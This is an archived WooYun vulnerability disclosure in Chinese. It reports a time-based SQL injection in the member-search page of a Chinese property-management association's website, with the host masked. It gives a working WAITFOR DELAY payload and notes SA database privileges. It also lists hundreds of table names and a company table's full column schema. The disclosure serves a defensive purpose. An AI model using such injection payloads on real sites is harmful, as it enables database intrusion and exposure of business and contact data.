当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134595

漏洞标题:中国物协官网sql注入大量公司数据泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 深挖洞

提交时间:2015-08-20 09:14

修复时间:2015-10-05 18:08

公开时间:2015-10-05 18:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

RT

详细说明:

中国物协官网出现SQL注入大量公司数据泄露还有客户关系管理系统同时使用一个数据库,大量物业公司信息泄露。用户的账户密码没看,也没有脱数据没传shell只统计数据个数。

漏洞证明:

URL:http://**.**.**.**:80/membersearch.aspx?KeyWord=
注入点:http://**.**.**.**:80/membersearch.aspx?KeyWord=注入点
payload:%';WAITFOR DELAY '0:0:5'--
数据库使用SA权限

QQ截图20150816235421.png


数据库密码

QQ截图20150816235607.png


物理路径

QQ截图20150816131158.png


网站开启目录浏览

QQ截图20150816131215.png


一共9个数据库

QQ截图20150816235918.png


当前数据库有1000多个表,时间注入太慢了用了一个星期才显示完整。

QQ截图20150817000109.png


客户关系管理系统

QQ截图20150817000242.png


贴出部分表

| CRM_HouseInfo                                  |
| CRM_IndividualInfo                             |
| CRM_InvestAnswer                               |
| CRM_InvestAnswerType                           |
| CRM_InvestItem                                 |
| CRM_InvestPlan                                 |
| CRM_InvestPlanType                             |
| CRM_InvestQuestion                             |
| CRM_InvestQuestionGroup                        |
| CRM_InvestResult                               |
| CRM_InvestSalutatory                           |
| CRM_InvestSwatch                               |
| CRM_IpadMacInfo                                |
| CRM_LiquidateRate                              |
| CRM_MapPointInfo                               |
| CRM_MapPrecinctInfo                            |
| CRM_MemberHouse                                |
| CRM_MemberLevelSet                             |
| CRM_MemberPrizeSet                             |
| CRM_MessageBack                                |
| CRM_MessageBackExecute                         |
| CRM_MessageInfo                                |
| CRM_MessageInfoLog                             |
| CRM_MessageSend                                |
| CRM_NotifyExecuteInfo                          |
| CRM_NotifyTemplate                             |
| CRM_OperatorHouse                              |
| CRM_OperatorHouseBak                           |
| CRM_OperatorQueryInfo                          |
| CRM_OperatorSalon                              |
| CRM_Phone2City                                 |
| CRM_Point                                      |
| CRM_PointItemSet                               |
| CRM_PointPlan                                  |
| CRM_PointPlanEncash                            |
| CRM_PointPlanSet                               |
| CRM_PointTransfer                              |
| CRM_PropertyMemberSynchronize                  |
| CRM_PurveyCompany                              |
| CRM_PurveyCompanyAppraise                      |
| CRM_PurveyCompanyContact                       |
| CRM_PurveyCompanyEligible                      |
| CRM_PurveyCompanyGroup                         |
| CRM_PurveyCompanyLinkman                       |
| CRM_Record                                     |
| CRM_RoomDetail                                 |
| CRM_RoomInfo                                   |
| CRM_RoomInfoChangeDetail                       |
| CRM_RoomStatusDetail                           |
| CRM_SalonCardRule                              |
| CRM_SalonHouse                                 |
| CRM_SalonInfo                                  |
| CRM_Template                                   |
| CRM_TemplateType                               |
| CRM_UserPoint                                  |
| CRM_UserPointDetail                            |
| Card_ConsumeCard                               |
| Card_CustomerCardDetail                        |
| Card_CustomerCardDetail_Cancel                 |
| Card_CustomerConsumeCard                       |
| Card_CustomerConsumeCard_Cancel                |
| Charge_ApportionBalanceSet                     |
| CheckHouse_CheckClass                          |
| CheckHouse_CheckClassInputAssist               |
| CheckHouse_CheckPlan                           |
| CheckHouse_CheckPlanDetail                     |
| CheckHouse_CheckPlanDetail2TemplateDetail      |
| CheckHouse_CheckResult                         |
| CheckHouse_CheckResultDetail                   |
| CheckHouse_CheckResultDetailRecode             |
| CheckHouse_CheckResultLog                      |
| CheckHouse_InputAssist                         |
| CheckHouse_SupprtCompany                       |
| CheckHouse_TaskContact                         |
| CheckHouse_TaskContactDetail                   |
| Common_Phone                                   |
| Contract_ContractCatalog                       |
| Contract_ContractChanging                      |
| Contract_ContractInfo                          |
| Contract_ContractSquareFact                    |
| Contract_ContractSquarePlan                    |
| Core_DataEntity                                |
| Core_DataEntityCol                             |
| Core_DataType                                  |
| Crm_CardIssue                                  |
| Crm_HouseDelivery                              |
| Crm_HouseDeliveryCheckStatus                   |
| Crm_HouseDeliveryProblem                       |
| Crm_HouseFloorPlan                             |
| Crm_RoomInfo_View                              |
| Crm_RoomInfo_ViewByLevel                       |
| Customer_BillTitle_History                     |
| Customer_Columns                               |
| Data_FillIn_Detail                             |
| Data_FillIn_Main                               |
| Exam_Question                                  |
| Exam_QuestionItem                              |
| Exam_QuestionType                              |
| Exam_TestPaper                                 |
| Exam_TestPaperContent                          |
| Exam_TestPaperQuestionKind                     |
| Exam_TestPaperQuestionMethod                   |
| Exam_TestPaperType                             |
| Exam_UserTestPaper                             |
| Exam_UserTestPaperAnswer                       |
| Exam_UserTestPaperAnswerLog                    |
| Exam_UserTestPaperCount                        |
| Exam_UserTestPaperLog                          |
| Fact_BT_Info                                   |
| Fact_CW_Info                                   |
| Fact_FZ_Info                                   |
| Fact_PZ_Info                                   |
| Grid_Columns                                   |
| Grid_UserColumns                               |
| HR_Assess                                      |
| HR_AssessDepartment                            |
| HR_AssessDetail                                |
| HR_BusinessDepartment                          |
| HR_BusinessDepartmentList                      |
| HR_BusinessDepartmentLog                       |
| HR_BusinessDepartmentUserQuery                 |
| HR_Certificate                                 |
| HR_CertificateBorrow                           |
| HR_CertificateReCheck                          |
| HR_ChangeDetail                                |
| HR_ChangeDetail_View                           |
| HR_CompanyAccount                              |
| HR_Contract                                    |
| HR_Contract_View                               |
| HR_CycWorkClass                                |
| HR_Department_View                             |
| HR_DeptChange                                  |
| HR_Education                                   |
| HR_EscapeMoney                                 |
| HR_FamilyInfo                                  |
| HR_Fire                                        |
| HR_FixSalary                                   |
| HR_Insurance                                   |
| HR_InsuranceView                               |
| HR_JobInterviews                               |
| HR_JobInvitations                              |
| HR_MonthClosing                                |
| HR_MonthClosingLog                             |
| HR_MonthClosingLogList                         |
| HR_MonthClosingUser                            |
| HR_ProcedureInfo                               |
| HR_Salary                                      |
| HR_SalaryAccountSet                            |
| HR_SalaryCheckLog                              |
| HR_SalaryLevel                                 |
| HR_SalaryLevelList                             |
| HR_SalaryMonthCheckLog                         |
| HR_SalaryMonthCheckLogList                     |
| HR_SalaryNext                                  |
| HR_SalaryOperateLog                            |
| HR_SalaryPayRelation                           |
| HR_SalarySet                                   |
| HR_SalaryTotalTemp                             |
| HR_SalaryTotalWelfare                          |
| HR_SalaryUserWell                              |
| HR_SalaryUserWellLog                           |
| HR_SalaryUserWellRight                         |
| HR_SalaryWarningDepartment                     |
| HR_SalaryWarningSetting                        |
| HR_SalaryWarningSettingList                    |
| HR_SalaryWell                                  |
| HR_Salary_AnnualBonus                          |
| HR_Salary_AnnualBonus_Setting                  |
| HR_Salary_AnnualBonus_User                     |
| HR_Salary_AnnualBonus_UserCheck                |
| HR_Salary_AnnualBonus_UserSalary               |
| HR_Salary_InsuranceView                        |
| HR_Salary_UserMonth_View                       |
| HR_Survey_Object_Subject_View                  |
| HR_Survey_Survey                               |
| HR_Survey_SurveyItem                           |
| HR_Survey_SurveyItemSelect                     |
| HR_Survey_SurveyObject                         |
| HR_Survey_SurveyObjectATT                      |
| HR_Survey_SurveyObjectM                        |
| Hr_PostPositiveStaffSet                        |
| Hr_Punishments                                 |
| Hr_PunishmentsType                             |
| Hr_TrainingDepartmentAssess                    |
| IBMS_BAControlStatus                           |
| IBMS_WarningLog                                |
| Knowledge_BrowseStat                           |
| Knowledge_Document                             |
| Knowledge_ProjectProduct                       |
| Knowledge_ProjectProductProgress               |
| Knowledge_ProjectProductSales                  |
| Knowledge_UserRight                            |
| MSG_CompanyInfo                                |
| MSG_PayHistory                                 |
| MSG_UserInfo                                   |
| MSG_UserPayHistory                             |
| Market_ActivityCharge                          |
| Market_ActivityChargeDetail                    |
| Market_ActivityScheme                          |
| Market_ActivitySchemeDetail                    |
| Market_ActivityType                            |
| Market_BPM_MarketEfficiencyDetail              |
| Market_MarketEfficiency                        |
| Market_MarketEfficiencyDetail                  |
| Market_MarketEfficiencyDetail_Content          |
| Meeting_Meeting                                |
| Meeting_Note                                   |
| Meeting_Schedule                               |
| Mobile_System_Exception                        |
| NewSee_UpdateSql                               |
| Office_Comment                                 |
| Office_Contact                                 |
| Office_Document                                |
| Office_Mail                                    |
| Office_MailTags                                |
| Office_MailUser                                |
| Office_ReadLog                                 |
| Office_RelateUser                              |
| Office_UserDelete                              |
| Office_UserTags                                |
| ProjectExpand_CustomerInfo                     |
| ProjectExpand_CustomerInfo_Contact             |
| ProjectExpand_ExpandClue                       |
| ProjectExpand_ExpandClue_Contact               |
| ProjectExpand_ExpandClue_Log                   |
| ProjectExpand_ExpandClue_NodeWork              |
| ProjectExpand_ExpandGroup                      |
| ProjectExpand_ExpandGroup_Member               |
| ProjectExpand_ExpandGroup_ViewUser             |
| ProjectExpand_NodeWork_Config                  |
| ProjectExpand_ProjectInfo                      |
| ProjectExpand_ProjectProperty                  |
| ProjectExpand_TalkRecord                       |
| Project_Calender                               |
| Project_CalenderAdvice                         |
| Project_CalenderOtherInfo                      |
| Project_ContractInfo                           |
| Project_Contract_Material_Detail               |
| Project_DepConclude                            |
| Project_DepPlanning                            |
| Project_DepPlanningDetail                      |
| Project_FundsRecord                            |
| Project_FundsSummary_Flow                      |
| Project_Goout                                  |
| Project_MaterialPlan_Detail                    |
| Project_MaterialPlan_Flow                      |
| Project_MonthPlanning                          |
| Project_PerConclude                            |
| Project_PerPlannAdv                            |
| Project_PerPlanning                            |
| Project_PerPlanning_ViewLog                    |
| Project_PlanningLeaderMarking                  |
| Project_PrecinctInfo                           |
| Project_ProjectContract_Detail                 |
| Project_ProjectContract_Flow                   |
| Project_ProjectContract_MonthReport            |
| Project_ProjectContract_MonthReport2Company    |
| Project_ProjectDocument                        |
| Project_ProjectInfo                            |
| Project_ProjectPartition                       |
| Project_ProjectPlan                            |
| Project_ProjectPlan_Link                       |
| Quality_QualityPoint                           |
| Quality_QualityPointExamin                     |
| Quality_QualityPointItem                       |
| Quality_QualityRecord                          |
| Quality_QualityRecordAdvice                    |
| Quality_QualityRecordDetail                    |
| Quality_QualitySchdule                         |
| Quality_QualitySchduleUser                     |
| Quality_QualityStandardUser                    |
| Quality_Task                                   |
| Quality_TaskStep                               |
| Register_AdvancedCommunity                     |
| Register_AdvancedGarden                        |
| Register_AdvancedManager                       |
| Register_AdvancedServicer                      |
| Register_Agency                                |
| Register_ClassSystemUser                       |
| Register_CompanyDeveloperInfo                  |
| Register_CompanyMember                         |
| Register_CompanyMemberFee                      |
| Register_CompanyMemberNewProject               |
| Register_CompanyMemberProject                  |
| Register_CompanyMemberRecommen                 |
| Register_CompanyMember_Message                 |
| Register_CompanyMember_Status                  |
| Register_CompanyMember_StatusLog               |
| Register_CompanyMember_Status_20141106         |
| Register_CompanyProject                        |
| Register_Course                                |
| Register_ExpressRecord                         |
| Register_Feedback                              |
| Register_IntegrityActivity                     |
| Register_IntegrityHonor                        |
| Register_IntegrityProject                      |
| Register_MaterialOrder                         |
| Register_MaterialOrderBook                     |
| Register_Meeting_MemberRegister                |
| Register_Meeting_MemberRegisterPayment         |
| Register_Meeting_MemberRegisterTrainingClass   |
| Register_Meeting_TrainingClass                 |
| Register_Meeting_TrainingClassStudent          |
| Register_Member                                |
| Register_MemberCertificate                     |
| Register_MemberClassPermit                     |
| Register_MemberCompany                         |
| Register_MemberExamScore                       |
| Register_MemberRegister                        |
| Register_MemberRegisterPayment                 |
| Register_MemberRegisterTrainingClass           |
| Register_MemberStudyEvaluation                 |
| Register_Member_Self_Query                     |
| Register_ReportPrintMap                        |
| Register_Resource_MeetPlaces                   |
| Register_Resource_MeetTopMember                |
| Register_StudentAttendance                     |
| Register_StudentAttendance2                    |
| Register_StudentAttendance2_Bak20140501        |
| Register_TeacherCourse                         |
| Register_TeachingEvaluation                    |
| Register_ThemeActivity                         |
| Register_ThemeActivityItem                     |
| Register_TrainingCategory                      |
| Register_TrainingCategoryReport                |
| Register_TrainingClass                         |
| Register_TrainingClassRoom                     |
| Register_TrainingClassStudent                  |


统计有2791个公司

QQ截图20150817000612.png


字段127个显示公司入会都需要录入什么信息

| ArenaArea                | decimal  |
| ArenaNum                 | int      |
| BankFile                 | nvarchar |
| BusinessArea             | decimal  |
| BusinessNum              | int      |
| CleanerNum               | int      |
| CollegerNum              | int      |
| Committee                | nvarchar |
| CompanyCity              | nvarchar |
| CompanyInfo              | nvarchar |
| CompanyInfoFile          | nvarchar |
| CompanyName              | nvarchar |
| CompanyProvince          | nvarchar |
| CompanyRange             | tinyint  |
| CompanyTelephone         | nvarchar |
| ConstructionQuality      | nvarchar |
| ConsultantArea           | decimal  |
| ConsultantNum            | int      |
| ContactAddress           | nvarchar |
| ContactJob               | nvarchar |
| ContactJobTitle          | int      |
| ContactMail              | nvarchar |
| ContactMobile            | nvarchar |
| ContactName              | nvarchar |
| ContactOtherJobTitle     | nvarchar |
| ContactTelephone         | nvarchar |
| Corporation              | nvarchar |
| CorporationCode          | nvarchar |
| CorporationMobile        | nvarchar |
| CreateDate               | datetime |
| CreateUserID             | bigint   |
| DemonstrationCountryNum  | int      |
| DemonstrationNum         | int      |
| DemonstrationProvinceNum | int      |
| DoctorNum                | int      |
| EmployeeNum              | int      |
| EvaluatOrganization      | tinyint  |
| EvaluatOrganizationOther | nvarchar |
| Fax                      | nvarchar |
| FoundDate                | datetime |
| GeneralManager           | nvarchar |
| GreenerNum               | int      |
| HighFloorArea            | decimal  |
| Honor                    | nvarchar |
| HospitalArea             | decimal  |
| HospitalNum              | int      |
| HouseProjectArea         | decimal  |
| HouseProjectNum          | int      |
| ID                       | bigint   |
| IndustryArea             | decimal  |
| IndustryNum              | int      |
| InvestCountry            | nvarchar |
| JuniorCollegeNum         | int      |
| LogoFile                 | nvarchar |
| MainBusiness             | nvarchar |
| MaintainCapital          | decimal  |
| MaintainNum              | int      |
| ManageCapital            | decimal  |
| ManageDirectorNum        | int      |
| ManagerJob               | nvarchar |
| ManagerMail              | nvarchar |
| ManagerMobile            | nvarchar |
| ManagerNum               | int      |
| ManagerPhone             | nvarchar |
| ManagerProjectArea       | decimal  |
| ManagerProjectNum        | int      |
| MasterNum                | int      |
| MemberID                 | bigint   |
| MutipleFloorArea         | decimal  |
| OfficeArea               | decimal  |
| OfficeNum                | int      |
| OneFloorArea             | decimal  |
| OperatorNum              | int      |
| OrderManageNum           | int      |
| OtherArea                | decimal  |
| OtherCapital             | decimal  |
| OtherContact             | xml      |
| OtherNum                 | int      |
| OtherProjectArea         | decimal  |
| OtherProjectNum          | int      |
| OtherWorkerNum           | int      |
| OutCleanArea             | decimal  |
| OutCleanerNum            | int      |
| OutCleanNum              | int      |
| OutGreenArea             | decimal  |
| OutGreenerNum            | int      |
| OutGreenNum              | int      |
| OutMaintainArea          | decimal  |
| OutMaintainerNum         | int      |
| OutMaintainNum           | int      |
| OutNum                   | int      |
| OutOrderManageArea       | decimal  |
| OutOrderManageNum        | int      |
| OutOrderManagerNum       | int      |
| ParentCompany            | nvarchar |
| PostCode                 | nvarchar |
| PropertyManagerNum       | int      |
| RegAddress               | nvarchar |
| RegisteredCapital        | decimal  |
| RegisterType             | nvarchar |
| Relation                 | tinyint  |
| Remark                   | nvarchar |
| RunCapital               | decimal  |
| RunCost                  | decimal  |
| RunManagerNum            | int      |
| SatisfiedContent         | nvarchar |
| SatisfiedContentOther    | nvarchar |
| SatisfiedFile            | nvarchar |
| SatisfiedFrequency       | tinyint  |
| SatisfiedFrequencyOther  | nvarchar |
| SatisfiedSample          | decimal  |
| SchoolArea               | decimal  |
| SchoolNum                | int      |
| SecondaryNum             | int      |
| SecondBusiness           | nvarchar |
| StatusID                 | bigint   |
| Telephone                | nvarchar |
| TopManagerNum            | int      |
| TotalCapital             | decimal  |
| TotalProfit              | decimal  |
| UnderHighSchoolNum       | int      |
| UpdateDate               | datetime |
| UpdateUserID             | bigint   |
| WebSite                  | nvarchar |
| YearCapital              | decimal  |
| YearProfit               | decimal  |
| YearTaxation             | decimal  |

修复方案:

关闭目录浏览,注入点过滤。

版权声明:转载请注明来源 深挖洞@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-21 18:07

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无